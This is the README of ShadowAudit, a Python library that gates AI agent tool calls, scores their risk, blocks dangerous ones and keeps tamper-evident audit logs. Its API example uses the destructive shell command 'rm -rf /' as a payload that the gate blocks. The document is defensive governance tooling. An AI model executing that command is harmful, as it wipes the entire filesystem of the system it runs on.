Runtime governance for AI agents — deterministic fail-closed enforcement. Wraps any agent tool and blocks dangerous calls before execution. Zero LLM calls, zero cloud dependencies, works offline.
ShadowAudit
Runtime governance for AI agents — deterministic fail-closed enforcement with auditor-defensible cryptographic audit logs.
ShadowAudit sits between your agent and its tools. It evaluates every call before execution and blocks anything that exceeds your risk threshold. Three things differentiate it from horizontal governance toolkits like Microsoft AGT: (1) auditor-defensible cryptographic audit logs — every decision is hash-chained and optionally Ed25519-signed, producing evidence conformity assessors accept; (2) financial-vertical taxonomy depth — built-in Stripe, Plaid, and fintech-specific risk categories out of the box; (3) air-gap-first deployment — single pip install, zero external calls, works inside isolated VPCs and on-prem.
Agent → ShadowAudit Gate → Tool (allowed)
                         → Blocked (AgentActionBlocked raised)
Why ShadowAudit?
| Problem | ShadowAudit's Answer |
|---|---|
| Agents execute arbitrary shell commands | Keyword + regex + AST risk scoring with configurable thresholds |
| No audit trail for agent decisions | Hash-chained, tamper-evident SQLite audit log with SHA-256 linkage and optional Ed25519 signing |
| Can't prove compliance to auditors | Professional HTML reports with SOX/PCI-DSS mappings + EU AI Act Annex IV evidence pack generator |
| Agent behavior drifts over time | Adaptive scoring with behavioral state tracking (K/V metrics) |
| CI/CD deploys unsafe agents | --fail-on-ungated flag blocks deployments |
| Legal team blocks cloud-dependent tools | Works fully offline — zero external calls |
| EU AI Act Annex IV evidence required | Built-in evidence pack generator (JSON + HTML) |
vs Microsoft Agent Governance Toolkit (AGT)
"AGT is the right horizontal governance toolkit. ShadowAudit is the auditor-defensible, financial-vertical, air-gap-ready layer for regulated workloads. Run both — AGT for breadth, ShadowAudit for the audit evidence your conformity assessor will actually accept."
See docs/POSITIONING.md for a detailed, honest comparison.
| Dimension | Microsoft AGT | ShadowAudit |
|---|---|---|
| License | MIT | MIT (OSS SDK) |
| Coverage | All 10 OWASP Agentic risks | 3–5 of 10, focused on tool-call execution |
| Vendor | Microsoft | Independent |
| Audit log | Standard logging | Hash-chained, Ed25519-signed, tamper-evident |
| Vertical taxonomies | Generic | Financial / fintech depth (Stripe, Plaid) |
| Air-gap deployment | Possible but assembly required | First-class — single pip install |
| EU AI Act evidence pack | Compliance module exists | Annex IV evidence-pack generator built-in |
| Solo-buyable for SMBs | No | Yes |
Hosted dashboard and managed cloud tier in development — contact for early access.
Quick Start
pip install shadowaudit
CLI: 4 commands to get started
# 1. Scan your codebase for ungated AI agent tools
shadowaudit check ./src
# 2. Generate a risk assessment with compliance mappings
shadowaudit assess ./src --taxonomy financial --compliance
# 3. Verify your audit log hasn't been tampered with
shadowaudit verify audit.db
# 4. Analyse decisions and get threshold tuning suggestions
shadowaudit tune --audit-log audit.db
For the full CLI reference (all 8 commands with flags and examples), see docs/CLI.md.
Python API — wrap any tool in 5 lines
from shadowaudit import Gate

gate = Gate()
result = gate.evaluate(
    agent_id="agent-1",
    task_context="shell_tool",
    risk_category="execute",
    payload={"command": "rm -rf /"},
)

print(result.passed)      # False
print(result.risk_score)  # 0.11 (varies by payload)
print(result.reason)      # "drift_detected"
Framework adapters: LangChain (ShadowAuditTool), CrewAI (ShadowAuditCrewAITool), LangGraph (ShadowAuditToolNode), OpenAI Agents SDK (ShadowAuditOpenAITool), and MCP (MCPGatewayServer + ShadowAuditMCPSession). See examples/ for runnable scripts for each.
Features
Tamper-Evident Audit
Every gate decision is recorded in an append-only SQLite log. Entries are hash-chained via SHA-256 — modify any row and the chain breaks. Optional Ed25519 signing cryptographically proves authenticity. Verified with shadowaudit verify. See examples/tamper_demo.py for a live demonstration.
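To make the hash-chaining idea concrete, here is a minimal in-memory sketch using only the standard library. It is not ShadowAudit's implementation: the record fields, the `GENESIS` value, and the helper names `entry_hash`, `append`, and `verify` are assumptions chosen for illustration, and Ed25519 signing is left out because it needs a third-party library.

```python
import hashlib
import json

GENESIS = "0" * 64  # assumed placeholder "previous hash" for the first entry


def entry_hash(prev_hash: str, record: dict) -> str:
    """Hash the previous entry's hash together with a canonical JSON record."""
    body = json.dumps(record, sort_keys=True, separators=(",", ":"))
    return hashlib.sha256((prev_hash + body).encode("utf-8")).hexdigest()


def append(log: list, record: dict) -> None:
    """Append a record, linking it to the hash of the entry before it."""
    prev = log[-1]["hash"] if log else GENESIS
    log.append({"record": record, "prev": prev, "hash": entry_hash(prev, record)})


def verify(log: list) -> int:
    """Return the index of the first broken entry, or -1 if the chain is intact."""
    prev = GENESIS
    for i, entry in enumerate(log):
        if entry["prev"] != prev or entry["hash"] != entry_hash(prev, entry["record"]):
            return i
        prev = entry["hash"]
    return -1


log = []
append(log, {"agent_id": "agent-1", "decision": "block", "reason": "threshold"})
append(log, {"agent_id": "agent-1", "decision": "pass", "reason": "ok"})
append(log, {"agent_id": "agent-2", "decision": "pass", "reason": "ok"})
intact = verify(log)

log[1]["record"]["decision"] = "block"  # tamper with the middle row
broken_at = verify(log)
print(intact, broken_at)
```

Because each hash covers the previous hash, an attacker who edits one row would also have to recompute every later hash. Signing the entries is what would stop someone with write access from doing exactly that.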
Observe Mode & Bypass
Roll out enforcement gradually with Gate(mode="observe"): decisions are logged but never blocked, and result.metadata["would_have_blocked"] tells you what enforce mode would have done. For human-approved overrides, use the bypass() context manager — every bypass is recorded in the audit log with a mandatory reason string.
# Shadow mode: log everything, block nothing
gate = Gate(mode="observe")
result = gate.evaluate(agent_id, task, category, payload)
print(result.metadata["would_have_blocked"])  # True if enforce would have blocked

# Bypass with immutable audit trail
with gate.bypass("agent-1", reason="approved by oncall #4521"):
    result = gate.evaluate("agent-1", task, category, payload)
Use shadowaudit tune --audit-log audit.db to analyse block rates per category and get threshold adjustment suggestions.
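For readers curious how observe mode and a reason-carrying bypass could fit together, the following is a toy sketch. `ToyGate`, its `threshold` parameter, and the audit event names are all hypothetical, and the risk score is passed in directly rather than computed; the real Gate may behave differently.

```python
from contextlib import contextmanager


class ToyGate:
    """Hypothetical stand-in for a gate; not ShadowAudit's implementation."""

    def __init__(self, mode="enforce", threshold=0.5):
        self.mode = mode
        self.threshold = threshold
        self.audit = []       # in-memory stand-in for the audit log
        self._bypassed = {}   # agent_id -> reason for an active bypass

    @contextmanager
    def bypass(self, agent_id, reason):
        if not reason or not reason.strip():
            raise ValueError("a bypass requires a non-empty reason")
        self._bypassed[agent_id] = reason
        self.audit.append({"event": "bypass_start", "agent_id": agent_id, "reason": reason})
        try:
            yield
        finally:
            # The override ends with the block, even if the body raises.
            del self._bypassed[agent_id]
            self.audit.append({"event": "bypass_end", "agent_id": agent_id})

    def evaluate(self, agent_id, score):
        would_block = score >= self.threshold
        overridden = agent_id in self._bypassed
        passed = (not would_block) or self.mode == "observe" or overridden
        self.audit.append({"event": "decision", "agent_id": agent_id,
                           "passed": passed, "would_have_blocked": would_block})
        return {"passed": passed, "would_have_blocked": would_block}


observe = ToyGate(mode="observe")
shadow = observe.evaluate("agent-1", score=0.9)

enforce = ToyGate(mode="enforce")
blocked = enforce.evaluate("agent-1", score=0.9)
with enforce.bypass("agent-1", reason="approved by oncall #4521"):
    overridden = enforce.evaluate("agent-1", score=0.9)
after = enforce.evaluate("agent-1", score=0.9)
```

The point of the sketch is that the would-have-blocked verdict is computed the same way in every mode, so logs gathered in observe mode remain comparable once enforcement is switched on.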
Multi-Agent Trust Propagation
FlowTracer tracks how data moves between agents and propagates trust downward. If Agent A processes untrusted web content, any payload that flows from A into Agent B's tool call is automatically tagged UNTRUSTED — regardless of B's own trust level.
from shadowaudit import FlowTracer, TrustLevel
tracer = FlowTracer()
tracer.record_output("web-scraper", scraped_data, trust=TrustLevel.UNTRUSTED)
tracer.record_flow("web-scraper", "summariser", parsed_data)
annotation = tracer.annotate(
receiving_agent="payment-agent",
source_agents=["summariser"],
declared_trust=TrustLevel.SYSTEM,
)
print(annotation.effective_trust) # TrustLevel.UNTRUSTED
print(annotation.contaminated_by) # ['web-scraper']
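One way to picture the propagation rule is as "effective trust is the minimum trust found anywhere in the data's lineage". The sketch below implements that rule under stated assumptions: `Trust`, `ToyTracer`, and the three-level ordering are hypothetical and are not the library's FlowTracer or TrustLevel.

```python
from enum import IntEnum


class Trust(IntEnum):
    """Hypothetical trust ordering; lower values are less trusted."""
    UNTRUSTED = 0
    USER = 1
    SYSTEM = 2


class ToyTracer:
    def __init__(self):
        self.own_trust = {}   # agent -> trust recorded for its own output
        self.upstream = {}    # agent -> set of agents it received data from

    def record_output(self, agent, trust):
        self.own_trust[agent] = trust

    def record_flow(self, source, target):
        self.upstream.setdefault(target, set()).add(source)

    def _ancestors(self, agent, seen):
        """Collect every agent whose data transitively reached `agent`."""
        for src in self.upstream.get(agent, ()):
            if src not in seen:
                seen.add(src)
                self._ancestors(src, seen)
        return seen

    def annotate(self, source_agents, declared_trust):
        lineage = set(source_agents)
        for agent in source_agents:
            self._ancestors(agent, lineage)
        # Agents with no recorded trust are assumed not to lower it.
        levels = {a: self.own_trust.get(a, declared_trust) for a in lineage}
        effective = min([declared_trust, *levels.values()])
        contaminated_by = sorted(a for a, t in levels.items() if t < declared_trust)
        return effective, contaminated_by


tracer = ToyTracer()
tracer.record_output("web-scraper", Trust.UNTRUSTED)
tracer.record_flow("web-scraper", "summariser")
effective, contaminated_by = tracer.annotate(["summariser"], Trust.SYSTEM)
print(effective.name, contaminated_by)
```

Taking the minimum means a trusted receiver can never raise the trust of what it was handed, which is the behaviour the payment-agent example above relies on.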
Vertical Taxonomies
Built-in starter packs across 6 domains: general, financial (32 categories — Stripe, Plaid, wire transfers, KYC/AML), financial crypto (18 categories), healthcare (17 categories), legal, and open banking. Each taxonomy defines risk keywords, threshold deltas, severity levels, and compliance mappings. Build custom taxonomies interactively with shadowaudit build-taxonomy.
Framework Coverage
First-class adapters for LangChain, CrewAI, LangGraph, OpenAI Agents SDK, and MCP (gateway + in-process). Drop-in wrappers — same interface, automatic enforcement. Works with any tool that has name, description, and run().
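The "name, description, and run()" contract suggests a duck-typed wrapper. The sketch below shows the general shape such a wrapper might take; `GatedTool`, `ActionBlocked`, `EchoTool`, and the `deny_rm` policy are invented for illustration and are not the shipped adapters.

```python
class ActionBlocked(Exception):
    """Hypothetical stand-in for the exception a gate raises on a block."""


class GatedTool:
    """Wrap any object exposing name, description, and run()."""

    def __init__(self, tool, is_allowed):
        self._tool = tool
        self._is_allowed = is_allowed   # callable(tool_name, payload) -> bool
        self.name = tool.name
        self.description = tool.description

    def run(self, payload):
        # Fail closed: an error inside the check counts as a block.
        try:
            allowed = self._is_allowed(self.name, payload) is True
        except Exception:
            allowed = False
        if not allowed:
            raise ActionBlocked(f"{self.name} blocked")
        return self._tool.run(payload)


class EchoTool:
    name = "echo"
    description = "Returns its input unchanged."

    def run(self, payload):
        return payload


def deny_rm(tool_name, payload):
    """Toy policy: refuse anything containing 'rm -rf'."""
    return "rm -rf" not in payload


tool = GatedTool(EchoTool(), deny_rm)
ok = tool.run("ls -la")
try:
    tool.run("rm -rf /")
    blocked = False
except ActionBlocked:
    blocked = True
```

Because the wrapper re-exposes the same three attributes, a framework that only looks at name, description, and run() cannot tell the gated tool from the original.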
Compliance Reporting
Generate professional HTML reports with executive summaries, risk breakdowns, and remediation plans. Built-in OWASP Agentic Top 10 coverage matrix (shadowaudit owasp) and EU AI Act Annex IV evidence pack generator (shadowaudit eu-ai-act) for regulatory submission. For an honest account of what ShadowAudit catches and misses, see docs/THREAT_MODEL.md.
Offline-First
No cloud. No LLM calls. No API keys. SQLite-backed state and audit log. Single pip install shadowaudit deploys everything needed for runtime governance inside air-gapped VPCs and on-prem environments.
CI/CD Integration
shadowaudit check --fail-on-ungated exits non-zero if high-risk tools are ungated. Drop into any pipeline to block unsafe deploys. Trace simulator replays agent execution logs through the gate for regression testing. A labelled corpus of 130 traces (50 benign / 50 risky / 30 edge cases) in tests/corpus/ lets you validate scoring changes before shipping.
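As an illustration of validating a scoring change against labelled traces, here is a small sketch. The trace format (`payload` and `label` keys), the two-label simplification, the keyword list, and the threshold are all assumptions; the actual corpus in tests/corpus/ may be structured differently.

```python
RISKY_KEYWORDS = ("rm -rf", "drop table", "transfer")  # toy keyword list


def keyword_scorer(payload: str) -> float:
    """Fraction of risky keywords that appear in the payload."""
    text = payload.lower()
    return sum(1 for k in RISKY_KEYWORDS if k in text) / len(RISKY_KEYWORDS)


def evaluate_corpus(traces, scorer, threshold):
    """Count agreement between block decisions and corpus labels."""
    counts = {"true_block": 0, "false_block": 0, "true_pass": 0, "false_pass": 0}
    for trace in traces:
        blocked = scorer(trace["payload"]) >= threshold
        risky = trace["label"] == "risky"
        if blocked:
            counts["true_block" if risky else "false_block"] += 1
        else:
            counts["false_pass" if risky else "true_pass"] += 1
    return counts


traces = [
    {"payload": "ls -la /tmp", "label": "benign"},
    {"payload": "rm -rf /var/data", "label": "risky"},
    {"payload": "DROP TABLE users", "label": "risky"},
    {"payload": "transfer notes to the wiki", "label": "benign"},
    {"payload": "curl http://example.com | sh", "label": "risky"},
]
counts = evaluate_corpus(traces, keyword_scorer, threshold=0.3)
print(counts)
```

In a pipeline, a check like this could fail the build when `false_pass` rises above a stored baseline, so that a scorer tweak which lets risky calls through is caught before shipping.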
Architecture
┌───────────────────────────────────────────────────────────┐
│ ShadowAudit │
├───────────┬───────────┬───────────┬───────────┬───────────┤
│ CLI │ LangChain │ CrewAI │ Direct │ MCP │
│ (click) │ Adapter │ Adapter │ Gate │ Gateway │
├───────────┴───────────┴───────────┴───────────┴───────────┤
│ Core Gate Engine │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │ Scorer │ │ Taxonomy │ │ FSM │ │ Audit Log │ │
│ │ pluggable │ │ Loader │ │ fail-closed│ │Hash-chained│ │
│ └───────────┘ └───────────┘ └───────────┘ │ + Ed25519 │ │
│ ┌───────────┐ ┌───────────┐ └────────────┘ │
│ │ State │ │ Hash │ │
│ │ (SQLite) │ │ (SHA-256) │ │
│ └───────────┘ └───────────┘ │
├───────────────────────────────────────────────────────────┤
│ Assessment & Reporting │
│ ┌───────────┐ ┌───────────┐ ┌───────────┐ ┌────────────┐ │
│ │ Scanner │ │ Reporter │ │ Simulator │ │ Builder │ │
│ │ │ │ (Jinja2) │ │ │ │ │ │
│ └───────────┘ └───────────┘ └───────────┘ └────────────┘ │
└───────────────────────────────────────────────────────────┘
How a tool call is evaluated
- Agent calls a tool → intercepted by the framework adapter or direct Gate.evaluate()
- Taxonomy lookup → finds risk category config (keywords, threshold delta, severity)
- Scoring → pluggable scorer computes risk score from payload content
- Threshold comparison → score vs. taxonomy delta determines pass/fail
- Mode / bypass check → observe mode always passes; active bypass() overrides a block
- FSM transition → fail-closed state machine: anything not an explicit pass is a block
- Audit log → decision recorded with timestamp, agent ID, payload hash, and reason
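The steps above can be sketched as a single function. This is a simplified illustration, not the engine itself: the `TAXONOMY` entries, the keyword scorer, the reason strings, and the use of a plain threshold in place of a threshold delta are all assumptions, and the mode and bypass check is omitted for brevity.

```python
import hashlib
import json
import time

TAXONOMY = {  # hypothetical entries; real taxonomies define more fields
    "execute": {"keywords": ("rm -rf", "sudo", "mkfs"), "threshold": 0.3, "severity": "high"},
    "read": {"keywords": ("/etc/shadow",), "threshold": 0.5, "severity": "low"},
}


def keyword_score(payload, keywords):
    """Fraction of the category's keywords found in the serialised payload."""
    text = json.dumps(payload, sort_keys=True).lower()
    return sum(k in text for k in keywords) / len(keywords)


def evaluate(agent_id, risk_category, payload, audit_log):
    passed, reason, score = False, "unclassified", None  # fail-closed default
    try:
        config = TAXONOMY.get(risk_category)              # taxonomy lookup
        if config is None:
            reason = "unknown_category"
        else:
            score = keyword_score(payload, config["keywords"])  # scoring
            if score < config["threshold"]:               # threshold comparison
                passed, reason = True, "below_threshold"
            else:
                reason = "threshold_exceeded"
    except Exception:
        # Any error during evaluation is treated as a block, never a pass.
        passed, reason = False, "evaluation_error"
    payload_hash = hashlib.sha256(
        json.dumps(payload, sort_keys=True, default=str).encode("utf-8")
    ).hexdigest()
    audit_log.append({"ts": time.time(), "agent_id": agent_id, "passed": passed,
                      "payload_hash": payload_hash, "reason": reason})
    return passed, reason, score


audit = []
r_block = evaluate("agent-1", "execute", {"command": "rm -rf /"}, audit)
r_pass = evaluate("agent-1", "execute", {"command": "ls"}, audit)
r_unknown = evaluate("agent-1", "teleport", {"command": "ls"}, audit)
r_error = evaluate("agent-1", "execute", {"obj": object()}, audit)
```

Note that only one branch ever sets `passed` to True; an unknown category, a scorer error, or a score at the threshold all fall through to a block, which is what "fail-closed" means here.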
Installation
# Base install — CLI + core gate (click, jinja2)
pip install shadowaudit
# With LangChain adapter
pip install shadowaudit[langchain]
# With CrewAI adapter (Python 3.10–3.12)
pip install shadowaudit[crewai]
# Development
pip install shadowaudit[dev]
Requirements: Python 3.10+
Examples
See the examples/ directory for runnable scripts:
| Example | Description |
|---|---|
| local_only.py | Direct Gate usage with no framework dependencies |
| langchain_agent.py | LangChain agent with ShadowAudit-wrapped tools |
| hash_chain_demo.py | Hash-chained audit log with tamper detection |
| tamper_demo.py | Live tamper-evidence demo: corrupt a row, watch the chain break |
| fintech_payment_agent.py | Production-style payment agent with Gate enforcement and retry logic |
| langgraph_demo.py | LangGraph ShadowAuditToolNode integration |
| eu_ai_act_demo.py | EU AI Act Annex IV evidence pack generation |
Run all examples at once:
python examples/run_all_examples.py
For the full example index (14 scripts covering every v0.4.0 feature), see docs/FEATURES.md.
Testing
Quick smoke test after installing:
shadowaudit --version && \
shadowaudit check . && \
shadowaudit owasp && \
python -c "from shadowaudit.core.gate import Gate; print(Gate().evaluate(agent_id='agent-1', task_context='shell_tool', risk_category='execute', payload={'command': 'ls'}).passed)"
For the full testing guide, see docs/TESTING_GUIDE.md.
Project Status
ShadowAudit is v0.4.0 — production-ready for audit-time scanning and assessment workflows; runtime gating is in early-adopter use. APIs may evolve before v1.0.0; breaking changes require a major version bump and migration guide.
- ✅ Core gate + 5 framework adapters (LangChain, CrewAI, LangGraph, OpenAI Agents, MCP)
- ✅ Hash-chained, Ed25519-signed audit log with integrity verification
- ✅ Observe mode, bypass context manager, and threshold tuning CLI
- ✅ Multi-agent trust propagation via FlowTracer
- ✅ Vertical taxonomies (general, financial 32-cat, financial_crypto, healthcare, legal, Plaid) + interactive builder
- ✅ Labelled test corpus (130 traces) + scorer benchmark
- ✅ Compliance reporting (OWASP matrix, EU AI Act Annex IV evidence packs)
- ✅ Honest threat model — what ShadowAudit catches and what it doesn't (docs/THREAT_MODEL.md)
- ✅ Offline-first — zero external calls, air-gap ready
Contributing
Bug reports and pull requests are welcome. See CONTRIBUTING.md for development setup, testing, and the PR process.
git clone https://github.com/AnshumanKumar14/shadowaudit-python.git
cd shadowaudit-python
pip install -e ".[dev,langchain]"
pytest tests/ -q
License
MIT — see LICENSE.
Built by Anshuman Kumar